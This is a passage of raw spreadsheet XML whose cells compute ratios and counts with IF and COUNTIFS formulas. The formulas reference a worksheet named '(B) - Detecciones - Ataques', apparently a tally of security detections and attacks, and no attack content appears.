      <c r="EO81" s="626"/>
      <c r="EP81" s="744"/>
      <c r="EQ81" s="745"/>
      <c r="ER81" s="745"/>
      <c r="ES81" s="745"/>
      <c r="ET81" s="745"/>
      <c r="EU81" s="745"/>
      <c r="EV81" s="745"/>
      <c r="EW81" s="745"/>
      <c r="EX81" s="745"/>
      <c r="EY81" s="745"/>
      <c r="EZ81" s="745"/>
      <c r="FA81" s="745"/>
      <c r="FB81" s="745"/>
      <c r="FC81" s="745"/>
      <c r="FD81" s="745"/>
      <c r="FE81" s="745"/>
      <c r="FF81" s="745"/>
      <c r="FG81" s="745"/>
      <c r="FH81" s="745"/>
      <c r="FI81" s="745"/>
      <c r="FJ81" s="745"/>
      <c r="FK81" s="745"/>
      <c r="FL81" s="745"/>
      <c r="FM81" s="745"/>
      <c r="FN81" s="745"/>
      <c r="FO81" s="745"/>
      <c r="FP81" s="745"/>
      <c r="FQ81" s="745"/>
      <c r="FR81" s="745"/>
      <c r="FS81" s="745"/>
      <c r="FT81" s="745"/>
      <c r="FU81" s="745"/>
    </row>
    <row r="82">
      <c r="ED82" s="20"/>
      <c r="EE82" s="36"/>
      <c r="EL82" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP73&lt;&gt;0,'(B) - Detecciones - Ataques'!IP73*'(B) - Detecciones - Ataques'!IL73/('(B) - Detecciones - Ataques'!IL73+'(B) - Detecciones - Ataques'!IN73),0)</f>
        <v>1</v>
      </c>
      <c r="EM82" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP73&lt;&gt;0,'(B) - Detecciones - Ataques'!IP73*'(B) - Detecciones - Ataques'!IN73/('(B) - Detecciones - Ataques'!IL73+'(B) - Detecciones - Ataques'!IN73),0)</f>
        <v>0</v>
      </c>
      <c r="EN82" s="626"/>
      <c r="EO82" s="626"/>
      <c r="EP82" s="744"/>
      <c r="EQ82" s="745"/>
      <c r="ER82" s="745"/>
      <c r="ES82" s="745"/>
      <c r="ET82" s="745"/>
      <c r="EU82" s="745"/>
      <c r="EV82" s="745"/>
      <c r="EW82" s="745"/>
      <c r="EX82" s="745"/>
      <c r="EY82" s="745"/>
      <c r="EZ82" s="745"/>
      <c r="FA82" s="745"/>
      <c r="FB82" s="745"/>
      <c r="FC82" s="745"/>
      <c r="FD82" s="745"/>
      <c r="FE82" s="745"/>
      <c r="FF82" s="745"/>
      <c r="FG82" s="745"/>
      <c r="FH82" s="745"/>
      <c r="FI82" s="745"/>
      <c r="FJ82" s="745"/>
      <c r="FK82" s="745"/>
      <c r="FL82" s="745"/>
      <c r="FM82" s="745"/>
      <c r="FN82" s="745"/>
      <c r="FO82" s="745"/>
      <c r="FP82" s="745"/>
      <c r="FQ82" s="745"/>
      <c r="FR82" s="745"/>
      <c r="FS82" s="745"/>
      <c r="FT82" s="745"/>
      <c r="FU82" s="745"/>
    </row>
    <row r="83">
      <c r="ED83" s="20"/>
      <c r="EE83" s="36"/>
      <c r="EL83" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP74&lt;&gt;0,'(B) - Detecciones - Ataques'!IP74*'(B) - Detecciones - Ataques'!IL74/('(B) - Detecciones - Ataques'!IL74+'(B) - Detecciones - Ataques'!IN74),0)</f>
        <v>0.0001933114247</v>
      </c>
      <c r="EM83" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP74&lt;&gt;0,'(B) - Detecciones - Ataques'!IP74*'(B) - Detecciones - Ataques'!IN74/('(B) - Detecciones - Ataques'!IL74+'(B) - Detecciones - Ataques'!IN74),0)</f>
        <v>0.9974869515</v>
      </c>
      <c r="EN83" s="626"/>
      <c r="EO83" s="626"/>
      <c r="EP83" s="744"/>
      <c r="EQ83" s="745"/>
      <c r="ER83" s="745"/>
      <c r="ES83" s="745"/>
      <c r="ET83" s="745"/>
      <c r="EU83" s="745"/>
      <c r="EV83" s="745"/>
      <c r="EW83" s="745"/>
      <c r="EX83" s="745"/>
      <c r="EY83" s="745"/>
      <c r="EZ83" s="745"/>
      <c r="FA83" s="745"/>
      <c r="FB83" s="745"/>
      <c r="FC83" s="745"/>
      <c r="FD83" s="745"/>
      <c r="FE83" s="745"/>
      <c r="FF83" s="745"/>
      <c r="FG83" s="745"/>
      <c r="FH83" s="745"/>
      <c r="FI83" s="745"/>
      <c r="FJ83" s="745"/>
      <c r="FK83" s="745"/>
      <c r="FL83" s="745"/>
      <c r="FM83" s="745"/>
      <c r="FN83" s="745"/>
      <c r="FO83" s="745"/>
      <c r="FP83" s="745"/>
      <c r="FQ83" s="745"/>
      <c r="FR83" s="745"/>
      <c r="FS83" s="745"/>
      <c r="FT83" s="745"/>
      <c r="FU83" s="745"/>
    </row>
    <row r="84">
      <c r="ED84" s="20"/>
      <c r="EE84" s="21" t="s">
        <v>2690</v>
      </c>
      <c r="EF84" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139,100%)</f>
        <v>43</v>
      </c>
      <c r="EL84" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP75&lt;&gt;0,'(B) - Detecciones - Ataques'!IP75*'(B) - Detecciones - Ataques'!IL75/('(B) - Detecciones - Ataques'!IL75+'(B) - Detecciones - Ataques'!IN75),0)</f>
        <v>0</v>
      </c>
      <c r="EM84" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP75&lt;&gt;0,'(B) - Detecciones - Ataques'!IP75*'(B) - Detecciones - Ataques'!IN75/('(B) - Detecciones - Ataques'!IL75+'(B) - Detecciones - Ataques'!IN75),0)</f>
        <v>0</v>
      </c>
      <c r="EN84" s="626"/>
      <c r="EO84" s="626"/>
      <c r="EP84" s="744"/>
      <c r="EQ84" s="745"/>
      <c r="ER84" s="745"/>
      <c r="ES84" s="745"/>
      <c r="ET84" s="745"/>
      <c r="EU84" s="745"/>
      <c r="EV84" s="745"/>
      <c r="EW84" s="745"/>
      <c r="EX84" s="745"/>
      <c r="EY84" s="745"/>
      <c r="EZ84" s="745"/>
      <c r="FA84" s="745"/>
      <c r="FB84" s="745"/>
      <c r="FC84" s="745"/>
      <c r="FD84" s="745"/>
      <c r="FE84" s="745"/>
      <c r="FF84" s="745"/>
      <c r="FG84" s="745"/>
      <c r="FH84" s="745"/>
      <c r="FI84" s="745"/>
      <c r="FJ84" s="745"/>
      <c r="FK84" s="745"/>
      <c r="FL84" s="745"/>
      <c r="FM84" s="745"/>
      <c r="FN84" s="745"/>
      <c r="FO84" s="745"/>
      <c r="FP84" s="745"/>
      <c r="FQ84" s="745"/>
      <c r="FR84" s="745"/>
      <c r="FS84" s="745"/>
      <c r="FT84" s="745"/>
      <c r="FU84" s="745"/>
    </row>
    <row r="85">
      <c r="EE85" s="21" t="s">
        <v>2691</v>
      </c>
      <c r="EF85" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139,"&lt;&gt;100%")</f>
        <v>45</v>
      </c>
      <c r="EL85" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP76&lt;&gt;0,'(B) - Detecciones - Ataques'!IP76*'(B) - Detecciones - Ataques'!IL76/('(B) - Detecciones - Ataques'!IL76+'(B) - Detecciones - Ataques'!IN76),0)</f>
        <v>0</v>
      </c>
      <c r="EM85" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP76&lt;&gt;0,'(B) - Detecciones - Ataques'!IP76*'(B) - Detecciones - Ataques'!IN76/('(B) - Detecciones - Ataques'!IL76+'(B) - Detecciones - Ataques'!IN76),0)</f>
        <v>0</v>
      </c>
      <c r="EN85" s="626"/>
      <c r="EO85" s="626"/>
      <c r="EP85" s="744"/>
      <c r="EQ85" s="745"/>
      <c r="ER85" s="745"/>
      <c r="ES85" s="745"/>
      <c r="ET85" s="745"/>
      <c r="EU85" s="745"/>
      <c r="EV85" s="745"/>
      <c r="EW85" s="745"/>
      <c r="EX85" s="745"/>
      <c r="EY85" s="745"/>
      <c r="EZ85" s="745"/>
      <c r="FA85" s="745"/>
      <c r="FB85" s="745"/>
      <c r="FC85" s="745"/>
      <c r="FD85" s="745"/>
      <c r="FE85" s="745"/>
      <c r="FF85" s="745"/>
      <c r="FG85" s="745"/>
      <c r="FH85" s="745"/>
      <c r="FI85" s="745"/>
      <c r="FJ85" s="745"/>
      <c r="FK85" s="745"/>
      <c r="FL85" s="745"/>
      <c r="FM85" s="745"/>
      <c r="FN85" s="745"/>
      <c r="FO85" s="745"/>
      <c r="FP85" s="745"/>
      <c r="FQ85" s="745"/>
      <c r="FR85" s="745"/>
      <c r="FS85" s="745"/>
      <c r="FT85" s="745"/>
      <c r="FU85" s="745"/>
    </row>
    <row r="86">
      <c r="EL86" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP77&lt;&gt;0,'(B) - Detecciones - Ataques'!IP77*'(B) - Detecciones - Ataques'!IL77/('(B) - Detecciones - Ataques'!IL77+'(B) - Detecciones - Ataques'!IN77),0)</f>
        <v>0</v>
      </c>
      <c r="EM86" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP77&lt;&gt;0,'(B) - Detecciones - Ataques'!IP77*'(B) - Detecciones - Ataques'!IN77/('(B) - Detecciones - Ataques'!IL77+'(B) - Detecciones - Ataques'!IN77),0)</f>
        <v>0</v>
      </c>
      <c r="EN86" s="626"/>
      <c r="EO86" s="626"/>
      <c r="EP86" s="744"/>
      <c r="EQ86" s="745"/>
      <c r="ER86" s="745"/>
      <c r="ES86" s="745"/>
      <c r="ET86" s="745"/>
      <c r="EU86" s="745"/>
      <c r="EV86" s="745"/>
      <c r="EW86" s="745"/>
      <c r="EX86" s="745"/>
      <c r="EY86" s="745"/>
      <c r="EZ86" s="745"/>
      <c r="FA86" s="745"/>
      <c r="FB86" s="745"/>
      <c r="FC86" s="745"/>
      <c r="FD86" s="745"/>
      <c r="FE86" s="745"/>
      <c r="FF86" s="745"/>
      <c r="FG86" s="745"/>
      <c r="FH86" s="745"/>
      <c r="FI86" s="745"/>
      <c r="FJ86" s="745"/>
      <c r="FK86" s="745"/>
      <c r="FL86" s="745"/>
      <c r="FM86" s="745"/>
      <c r="FN86" s="745"/>
      <c r="FO86" s="745"/>
      <c r="FP86" s="745"/>
      <c r="FQ86" s="745"/>
      <c r="FR86" s="745"/>
      <c r="FS86" s="745"/>
      <c r="FT86" s="745"/>
      <c r="FU86" s="745"/>
    </row>
    <row r="87">
      <c r="EL87" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP78&lt;&gt;0,'(B) - Detecciones - Ataques'!IP78*'(B) - Detecciones - Ataques'!IL78/('(B) - Detecciones - Ataques'!IL78+'(B) - Detecciones - Ataques'!IN78),0)</f>
        <v>1</v>
      </c>
      <c r="EM87" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP78&lt;&gt;0,'(B) - Detecciones - Ataques'!IP78*'(B) - Detecciones - Ataques'!IN78/('(B) - Detecciones - Ataques'!IL78+'(B) - Detecciones - Ataques'!IN78),0)</f>
        <v>0</v>
      </c>
      <c r="EN87" s="626"/>
      <c r="EO87" s="626"/>
      <c r="EP87" s="744"/>
      <c r="EQ87" s="745"/>
      <c r="ER87" s="745"/>
      <c r="ES87" s="745"/>
      <c r="ET87" s="745"/>
      <c r="EU87" s="745"/>
      <c r="EV87" s="745"/>
      <c r="EW87" s="745"/>
      <c r="EX87" s="745"/>
      <c r="EY87" s="745"/>
      <c r="EZ87" s="745"/>
      <c r="FA87" s="745"/>
      <c r="FB87" s="745"/>
      <c r="FC87" s="745"/>
      <c r="FD87" s="745"/>
      <c r="FE87" s="745"/>
      <c r="FF87" s="745"/>
      <c r="FG87" s="745"/>
      <c r="FH87" s="745"/>
      <c r="FI87" s="745"/>
      <c r="FJ87" s="745"/>
      <c r="FK87" s="745"/>
      <c r="FL87" s="745"/>
      <c r="FM87" s="745"/>
      <c r="FN87" s="745"/>
      <c r="FO87" s="745"/>
      <c r="FP87" s="745"/>
      <c r="FQ87" s="745"/>
      <c r="FR87" s="745"/>
      <c r="FS87" s="745"/>
      <c r="FT87" s="745"/>
      <c r="FU87" s="745"/>
    </row>
    <row r="88">
      <c r="EL88" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP79&lt;&gt;0,'(B) - Detecciones - Ataques'!IP79*'(B) - Detecciones - Ataques'!IL79/('(B) - Detecciones - Ataques'!IL79+'(B) - Detecciones - Ataques'!IN79),0)</f>
        <v>0</v>
      </c>
      <c r="EM88" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP79&lt;&gt;0,'(B) - Detecciones - Ataques'!IP79*'(B) - Detecciones - Ataques'!IN79/('(B) - Detecciones - Ataques'!IL79+'(B) - Detecciones - Ataques'!IN79),0)</f>
        <v>0</v>
      </c>
      <c r="EN88" s="626"/>
      <c r="EO88" s="626"/>
      <c r="EP88" s="744"/>
      <c r="EQ88" s="745"/>
      <c r="ER88" s="745"/>
      <c r="ES88" s="745"/>
      <c r="ET88" s="745"/>
      <c r="EU88" s="745"/>
      <c r="EV88" s="745"/>
      <c r="EW88" s="745"/>
      <c r="EX88" s="745"/>
      <c r="EY88" s="745"/>
      <c r="EZ88" s="745"/>
      <c r="FA88" s="745"/>
      <c r="FB88" s="745"/>
      <c r="FC88" s="745"/>
      <c r="FD88" s="745"/>
      <c r="FE88" s="745"/>
      <c r="FF88" s="745"/>
      <c r="FG88" s="745"/>
      <c r="FH88" s="745"/>
      <c r="FI88" s="745"/>
      <c r="FJ88" s="745"/>
      <c r="FK88" s="745"/>
      <c r="FL88" s="745"/>
      <c r="FM88" s="745"/>
      <c r="FN88" s="745"/>
      <c r="FO88" s="745"/>
      <c r="FP88" s="745"/>
      <c r="FQ88" s="745"/>
      <c r="FR88" s="745"/>
      <c r="FS88" s="745"/>
      <c r="FT88" s="745"/>
      <c r="FU88" s="745"/>
    </row>
    <row r="89">
      <c r="EE89" s="20" t="s">
        <v>2692</v>
      </c>
      <c r="EF89" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!IL3:IL139,0,'(B) - Detecciones - Ataques'!IN3:IN139,0)</f>
        <v>37</v>
      </c>
      <c r="EL89" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP80&lt;&gt;0,'(B) - Detecciones - Ataques'!IP80*'(B) - Detecciones - Ataques'!IL80/('(B) - Detecciones - Ataques'!IL80+'(B) - Detecciones - Ataques'!IN80),0)</f>
        <v>1</v>
      </c>
      <c r="EM89" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP80&lt;&gt;0,'(B) - Detecciones - Ataques'!IP80*'(B) - Detecciones - Ataques'!IN80/('(B) - Detecciones - Ataques'!IL80+'(B) - Detecciones - Ataques'!IN80),0)</f>
        <v>0</v>
      </c>
      <c r="EN89" s="626"/>
      <c r="EO89" s="626"/>
      <c r="EP89" s="744"/>
      <c r="EQ89" s="745"/>
      <c r="ER89" s="745"/>
      <c r="ES89" s="745"/>
      <c r="ET89" s="745"/>
      <c r="EU89" s="745"/>
      <c r="EV89" s="745"/>
      <c r="EW89" s="745"/>
      <c r="EX89" s="745"/>
      <c r="EY89" s="745"/>
      <c r="EZ89" s="745"/>
      <c r="FA89" s="745"/>
      <c r="FB89" s="745"/>
      <c r="FC89" s="745"/>
      <c r="FD89" s="745"/>
      <c r="FE89" s="745"/>
      <c r="FF89" s="745"/>
      <c r="FG89" s="745"/>
      <c r="FH89" s="745"/>
      <c r="FI89" s="745"/>
      <c r="FJ89" s="745"/>
      <c r="FK89" s="745"/>
      <c r="FL89" s="745"/>
      <c r="FM89" s="745"/>
      <c r="FN89" s="745"/>
      <c r="FO89" s="745"/>
      <c r="FP89" s="745"/>
      <c r="FQ89" s="745"/>
      <c r="FR89" s="745"/>
      <c r="FS89" s="745"/>
      <c r="FT89" s="745"/>
      <c r="FU89" s="745"/>
    </row>
    <row r="90">
      <c r="EE90" s="20" t="s">
        <v>2693</v>
      </c>
      <c r="EF90" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!IL3:IL139,0,'(B) - Detecciones - Ataques'!IN3:IN139,"&lt;&gt;0")</f>
        <v>38</v>
      </c>
      <c r="EL90" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP81&lt;&gt;0,'(B) - Detecciones - Ataques'!IP81*'(B) - Detecciones - Ataques'!IL81/('(B) - Detecciones - Ataques'!IL81+'(B) - Detecciones - Ataques'!IN81),0)</f>
        <v>0</v>
      </c>
      <c r="EM90" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP81&lt;&gt;0,'(B) - Detecciones - Ataques'!IP81*'(B) - Detecciones - Ataques'!IN81/('(B) - Detecciones - Ataques'!IL81+'(B) - Detecciones - Ataques'!IN81),0)</f>
        <v>0</v>
      </c>
      <c r="EN90" s="626"/>
      <c r="EO90" s="626"/>
      <c r="EP90" s="744"/>
      <c r="EQ90" s="745"/>
      <c r="ER90" s="745"/>
      <c r="ES90" s="745"/>
      <c r="ET90" s="745"/>
      <c r="EU90" s="745"/>
      <c r="EV90" s="745"/>
      <c r="EW90" s="745"/>
      <c r="EX90" s="745"/>
      <c r="EY90" s="745"/>
      <c r="EZ90" s="745"/>
      <c r="FA90" s="745"/>
      <c r="FB90" s="745"/>
      <c r="FC90" s="745"/>
      <c r="FD90" s="745"/>
      <c r="FE90" s="745"/>
      <c r="FF90" s="745"/>
      <c r="FG90" s="745"/>
      <c r="FH90" s="745"/>
      <c r="FI90" s="745"/>
      <c r="FJ90" s="745"/>
      <c r="FK90" s="745"/>
      <c r="FL90" s="745"/>
      <c r="FM90" s="745"/>
      <c r="FN90" s="745"/>
      <c r="FO90" s="745"/>
      <c r="FP90" s="745"/>
      <c r="FQ90" s="745"/>
      <c r="FR90" s="745"/>
      <c r="FS90" s="745"/>
      <c r="FT90" s="745"/>
      <c r="FU90" s="745"/>
    </row>
    <row r="91">
      <c r="EE91" s="20" t="s">
        <v>2694</v>
      </c>
      <c r="EF91" s="36">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139,"&lt;&gt;100%",'(B) - Detecciones - Ataques'!IL3:IL139,"&lt;&gt;0")</f>
        <v>6</v>
      </c>
      <c r="EL91" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP82&lt;&gt;0,'(B) - Detecciones - Ataques'!IP82*'(B) - Detecciones - Ataques'!IL82/('(B) - Detecciones - Ataques'!IL82+'(B) - Detecciones - Ataques'!IN82),0)</f>
        <v>0</v>
      </c>
      <c r="EM91" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP82&lt;&gt;0,'(B) - Detecciones - Ataques'!IP82*'(B) - Detecciones - Ataques'!IN82/('(B) - Detecciones - Ataques'!IL82+'(B) - Detecciones - Ataques'!IN82),0)</f>
        <v>0</v>
      </c>
      <c r="EN91" s="626"/>
      <c r="EO91" s="626"/>
      <c r="EP91" s="744"/>
      <c r="EQ91" s="745"/>
      <c r="ER91" s="745"/>
      <c r="ES91" s="745"/>
      <c r="ET91" s="745"/>
      <c r="EU91" s="745"/>
      <c r="EV91" s="745"/>
      <c r="EW91" s="745"/>
      <c r="EX91" s="745"/>
      <c r="EY91" s="745"/>
      <c r="EZ91" s="745"/>
      <c r="FA91" s="745"/>
      <c r="FB91" s="745"/>
      <c r="FC91" s="745"/>
      <c r="FD91" s="745"/>
      <c r="FE91" s="745"/>
      <c r="FF91" s="745"/>
      <c r="FG91" s="745"/>
      <c r="FH91" s="745"/>
      <c r="FI91" s="745"/>
      <c r="FJ91" s="745"/>
      <c r="FK91" s="745"/>
      <c r="FL91" s="745"/>
      <c r="FM91" s="745"/>
      <c r="FN91" s="745"/>
      <c r="FO91" s="745"/>
      <c r="FP91" s="745"/>
      <c r="FQ91" s="745"/>
      <c r="FR91" s="745"/>
      <c r="FS91" s="745"/>
      <c r="FT91" s="745"/>
      <c r="FU91" s="745"/>
    </row>
    <row r="92">
      <c r="EL92" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP83&lt;&gt;0,'(B) - Detecciones - Ataques'!IP83*'(B) - Detecciones - Ataques'!IL83/('(B) - Detecciones - Ataques'!IL83+'(B) - Detecciones - Ataques'!IN83),0)</f>
        <v>1</v>
      </c>
      <c r="EM92" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP83&lt;&gt;0,'(B) - Detecciones - Ataques'!IP83*'(B) - Detecciones - Ataques'!IN83/('(B) - Detecciones - Ataques'!IL83+'(B) - Detecciones - Ataques'!IN83),0)</f>
        <v>0</v>
      </c>
      <c r="EN92" s="626"/>
      <c r="EO92" s="626"/>
      <c r="EP92" s="744"/>
      <c r="EQ92" s="745"/>
      <c r="ER92" s="745"/>
      <c r="ES92" s="745"/>
      <c r="ET92" s="745"/>
      <c r="EU92" s="745"/>
      <c r="EV92" s="745"/>
      <c r="EW92" s="745"/>
      <c r="EX92" s="745"/>
      <c r="EY92" s="745"/>
      <c r="EZ92" s="745"/>
      <c r="FA92" s="745"/>
      <c r="FB92" s="745"/>
      <c r="FC92" s="745"/>
      <c r="FD92" s="745"/>
      <c r="FE92" s="745"/>
      <c r="FF92" s="745"/>
      <c r="FG92" s="745"/>
      <c r="FH92" s="745"/>
      <c r="FI92" s="745"/>
      <c r="FJ92" s="745"/>
      <c r="FK92" s="745"/>
      <c r="FL92" s="745"/>
      <c r="FM92" s="745"/>
      <c r="FN92" s="745"/>
      <c r="FO92" s="745"/>
      <c r="FP92" s="745"/>
      <c r="FQ92" s="745"/>
      <c r="FR92" s="745"/>
      <c r="FS92" s="745"/>
      <c r="FT92" s="745"/>
      <c r="FU92" s="745"/>
    </row>
    <row r="93">
      <c r="EL93" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP84&lt;&gt;0,'(B) - Detecciones - Ataques'!IP84*'(B) - Detecciones - Ataques'!IL84/('(B) - Detecciones - Ataques'!IL84+'(B) - Detecciones - Ataques'!IN84),0)</f>
        <v>0</v>
      </c>
      <c r="EM93" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP84&lt;&gt;0,'(B) - Detecciones - Ataques'!IP84*'(B) - Detecciones - Ataques'!IN84/('(B) - Detecciones - Ataques'!IL84+'(B) - Detecciones - Ataques'!IN84),0)</f>
        <v>0</v>
      </c>
      <c r="EN93" s="626"/>
      <c r="EO93" s="626"/>
      <c r="EP93" s="744"/>
      <c r="EQ93" s="745"/>
      <c r="ER93" s="745"/>
      <c r="ES93" s="745"/>
      <c r="ET93" s="745"/>
      <c r="EU93" s="745"/>
      <c r="EV93" s="745"/>
      <c r="EW93" s="745"/>
      <c r="EX93" s="745"/>
      <c r="EY93" s="745"/>
      <c r="EZ93" s="745"/>
      <c r="FA93" s="745"/>
      <c r="FB93" s="745"/>
      <c r="FC93" s="745"/>
      <c r="FD93" s="745"/>
      <c r="FE93" s="745"/>
      <c r="FF93" s="745"/>
      <c r="FG93" s="745"/>
      <c r="FH93" s="745"/>
      <c r="FI93" s="745"/>
      <c r="FJ93" s="745"/>
      <c r="FK93" s="745"/>
      <c r="FL93" s="745"/>
      <c r="FM93" s="745"/>
      <c r="FN93" s="745"/>
      <c r="FO93" s="745"/>
      <c r="FP93" s="745"/>
      <c r="FQ93" s="745"/>
      <c r="FR93" s="745"/>
      <c r="FS93" s="745"/>
      <c r="FT93" s="745"/>
      <c r="FU93" s="745"/>
    </row>
    <row r="94">
      <c r="EL94" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP85&lt;&gt;0,'(B) - Detecciones - Ataques'!IP85*'(B) - Detecciones - Ataques'!IL85/('(B) - Detecciones - Ataques'!IL85+'(B) - Detecciones - Ataques'!IN85),0)</f>
        <v>0</v>
      </c>
      <c r="EM94" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP85&lt;&gt;0,'(B) - Detecciones - Ataques'!IP85*'(B) - Detecciones - Ataques'!IN85/('(B) - Detecciones - Ataques'!IL85+'(B) - Detecciones - Ataques'!IN85),0)</f>
        <v>0</v>
      </c>
      <c r="EN94" s="626"/>
      <c r="EO94" s="626"/>
      <c r="EP94" s="744"/>
      <c r="EQ94" s="745"/>
      <c r="ER94" s="745"/>
      <c r="ES94" s="745"/>
      <c r="ET94" s="745"/>
      <c r="EU94" s="745"/>
      <c r="EV94" s="745"/>
      <c r="EW94" s="745"/>
      <c r="EX94" s="745"/>
      <c r="EY94" s="745"/>
      <c r="EZ94" s="745"/>
      <c r="FA94" s="745"/>
      <c r="FB94" s="745"/>
      <c r="FC94" s="745"/>
      <c r="FD94" s="745"/>
      <c r="FE94" s="745"/>
      <c r="FF94" s="745"/>
      <c r="FG94" s="745"/>
      <c r="FH94" s="745"/>
      <c r="FI94" s="745"/>
      <c r="FJ94" s="745"/>
      <c r="FK94" s="745"/>
      <c r="FL94" s="745"/>
      <c r="FM94" s="745"/>
      <c r="FN94" s="745"/>
      <c r="FO94" s="745"/>
      <c r="FP94" s="745"/>
      <c r="FQ94" s="745"/>
      <c r="FR94" s="745"/>
      <c r="FS94" s="745"/>
      <c r="FT94" s="745"/>
      <c r="FU94" s="745"/>
    </row>
    <row r="95">
      <c r="EL95" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP86&lt;&gt;0,'(B) - Detecciones - Ataques'!IP86*'(B) - Detecciones - Ataques'!IL86/('(B) - Detecciones - Ataques'!IL86+'(B) - Detecciones - Ataques'!IN86),0)</f>
        <v>0</v>
      </c>
      <c r="EM95" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP86&lt;&gt;0,'(B) - Detecciones - Ataques'!IP86*'(B) - Detecciones - Ataques'!IN86/('(B) - Detecciones - Ataques'!IL86+'(B) - Detecciones - Ataques'!IN86),0)</f>
        <v>0</v>
      </c>
      <c r="EN95" s="626"/>
      <c r="EO95" s="626"/>
      <c r="EP95" s="744"/>
      <c r="EQ95" s="745"/>
      <c r="ER95" s="745"/>
      <c r="ES95" s="745"/>
      <c r="ET95" s="745"/>
      <c r="EU95" s="745"/>
      <c r="EV95" s="745"/>
      <c r="EW95" s="745"/>
      <c r="EX95" s="745"/>
      <c r="EY95" s="745"/>
      <c r="EZ95" s="745"/>
      <c r="FA95" s="745"/>
      <c r="FB95" s="745"/>
      <c r="FC95" s="745"/>
      <c r="FD95" s="745"/>
      <c r="FE95" s="745"/>
      <c r="FF95" s="745"/>
      <c r="FG95" s="745"/>
      <c r="FH95" s="745"/>
      <c r="FI95" s="745"/>
      <c r="FJ95" s="745"/>
      <c r="FK95" s="745"/>
      <c r="FL95" s="745"/>
      <c r="FM95" s="745"/>
      <c r="FN95" s="745"/>
      <c r="FO95" s="745"/>
      <c r="FP95" s="745"/>
      <c r="FQ95" s="745"/>
      <c r="FR95" s="745"/>
      <c r="FS95" s="745"/>
      <c r="FT95" s="745"/>
      <c r="FU95" s="745"/>
    </row>
    <row r="96">
      <c r="EL96" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP87&lt;&gt;0,'(B) - Detecciones - Ataques'!IP87*'(B) - Detecciones - Ataques'!IL87/('(B) - Detecciones - Ataques'!IL87+'(B) - Detecciones - Ataques'!IN87),0)</f>
        <v>0</v>
      </c>
      <c r="EM96" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP87&lt;&gt;0,'(B) - Detecciones - Ataques'!IP87*'(B) - Detecciones - Ataques'!IN87/('(B) - Detecciones - Ataques'!IL87+'(B) - Detecciones - Ataques'!IN87),0)</f>
        <v>0</v>
      </c>
      <c r="EN96" s="626"/>
      <c r="EO96" s="626"/>
      <c r="EP96" s="744"/>
      <c r="EQ96" s="745"/>
      <c r="ER96" s="745"/>
      <c r="ES96" s="745"/>
      <c r="ET96" s="745"/>
      <c r="EU96" s="745"/>
      <c r="EV96" s="745"/>
      <c r="EW96" s="745"/>
      <c r="EX96" s="745"/>
      <c r="EY96" s="745"/>
      <c r="EZ96" s="745"/>
      <c r="FA96" s="745"/>
      <c r="FB96" s="745"/>
      <c r="FC96" s="745"/>
      <c r="FD96" s="745"/>
      <c r="FE96" s="745"/>
      <c r="FF96" s="745"/>
      <c r="FG96" s="745"/>
      <c r="FH96" s="745"/>
      <c r="FI96" s="745"/>
      <c r="FJ96" s="745"/>
      <c r="FK96" s="745"/>
      <c r="FL96" s="745"/>
      <c r="FM96" s="745"/>
      <c r="FN96" s="745"/>
      <c r="FO96" s="745"/>
      <c r="FP96" s="745"/>
      <c r="FQ96" s="745"/>
      <c r="FR96" s="745"/>
      <c r="FS96" s="745"/>
      <c r="FT96" s="745"/>
      <c r="FU96" s="745"/>
    </row>
    <row r="97">
      <c r="EL97" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP88&lt;&gt;0,'(B) - Detecciones - Ataques'!IP88*'(B) - Detecciones - Ataques'!IL88/('(B) - Detecciones - Ataques'!IL88+'(B) - Detecciones - Ataques'!IN88),0)</f>
        <v>0</v>
      </c>
      <c r="EM97" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP88&lt;&gt;0,'(B) - Detecciones - Ataques'!IP88*'(B) - Detecciones - Ataques'!IN88/('(B) - Detecciones - Ataques'!IL88+'(B) - Detecciones - Ataques'!IN88),0)</f>
        <v>0</v>
      </c>
      <c r="EN97" s="626"/>
      <c r="EO97" s="626"/>
      <c r="EP97" s="744"/>
      <c r="EQ97" s="745"/>
      <c r="ER97" s="745"/>
      <c r="ES97" s="745"/>
      <c r="ET97" s="745"/>
      <c r="EU97" s="745"/>
      <c r="EV97" s="745"/>
      <c r="EW97" s="745"/>
